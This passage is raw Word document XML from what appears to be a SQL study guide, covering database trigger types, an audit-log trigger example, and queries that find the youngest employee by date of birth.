    <w:p w14:paraId="099073DD" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AFTER Trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B9AD5F" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C"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 xml:space="preserve">Fires </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>after</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the event has occurred.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3CBEF3" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C"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Used for logging, auditing, or enforcing business rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187634EA" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>INSTEAD OF Trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for views)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D8B72C" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C"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Replaces the action of the triggering event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F7D55F" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C"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Commonly used on views that are not directly updatable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C174CE" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00000000" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="42471184">
          <v:rect id="_x0000_i3014" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAACDC3" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trigger Example (AFTER INSERT):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A4A441" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CREATE TRIGGER trg_after_insert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053E398B" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AFTER INSERT ON Employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F323A80" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FOR EACH ROW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FB1267" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFD9AFD" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C"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INSERT INTO AuditLog (action_type, action_time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522F9DC5" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C"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VALUES ('INSERT', CURRENT_TIMESTAMP);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C481CF" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B4A39D" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00000000" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="3B77BD17">
          <v:rect id="_x0000_i3015" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F58777" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Cases of Triggers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5ABA5F" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Enforcing business rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AC95B2" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Auditing table changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F79693" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Automatic value updates (e.g., update timestamp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D582EC4" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="00CE4B95" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Synchronizing related tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073F0EA6" w14:textId="3ED67FBB"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26E51EAC">
          <v:rect id="_x0000_i3016" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0056D1F3" w14:textId="003B3235" w:rsidR="00205C15" w:rsidRPr="00CE4B95" w:rsidRDefault="00124EB7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="732" w:name="_Toc196308212"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="00B8001A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">uery </w:t>
      </w:r>
      <w:r w:rsidR="00B8001A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>- G</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>et the youngest employee from the employee table</w:t>
      </w:r>
      <w:r w:rsidR="00205C15" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="732"/>
    </w:p>
    <w:p w14:paraId="2C5CFE10" w14:textId="1D80505B" w:rsidR="00EB14F8" w:rsidRPr="005C1C9E" w:rsidRDefault="00EB14F8" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To get the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>youngest employee</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the employee table, assuming the table has a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>date of birth (dob)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> column:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068B6609" w14:textId="77777777" w:rsidR="00EB14F8" w:rsidRPr="005C1C9E" w:rsidRDefault="00EB14F8" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD61FEB" w14:textId="77777777" w:rsidR="00EB14F8" w:rsidRPr="005C1C9E" w:rsidRDefault="00EB14F8" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D933A23" w14:textId="77777777" w:rsidR="00EB14F8" w:rsidRPr="005C1C9E" w:rsidRDefault="00EB14F8" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FROM employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042A1A4C" w14:textId="77777777" w:rsidR="00EB14F8" w:rsidRPr="005C1C9E" w:rsidRDefault="00EB14F8" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ORDER BY dob DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3F9752" w14:textId="77777777" w:rsidR="00EB14F8" w:rsidRPr="005C1C9E" w:rsidRDefault="00EB14F8" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FETCH FIRST 1 ROW ONLY;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489D0A18" w14:textId="77777777" w:rsidR="00EB14F8" w:rsidRPr="005C1C9E" w:rsidRDefault="00EB14F8" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>📝</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Alternate using MIN if you store age directly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B99045F" w14:textId="77777777" w:rsidR="00EB14F8" w:rsidRPr="005C1C9E" w:rsidRDefault="00EB14F8" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48499F8E" w14:textId="77777777" w:rsidR="00EB14F8" w:rsidRPr="005C1C9E" w:rsidRDefault="00EB14F8" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FROM employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7AEBC4" w14:textId="77777777" w:rsidR="00EB14F8" w:rsidRPr="005C1C9E" w:rsidRDefault="00EB14F8" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WHERE dob = (SELECT MAX(dob) FROM employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B3AE98" w14:textId="77777777" w:rsidR="00EB14F8" w:rsidRPr="005C1C9E" w:rsidRDefault="00EB14F8"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MAX(dob) gives the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>most recent date of birth</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, i.e., the </w:t>
      </w:r>
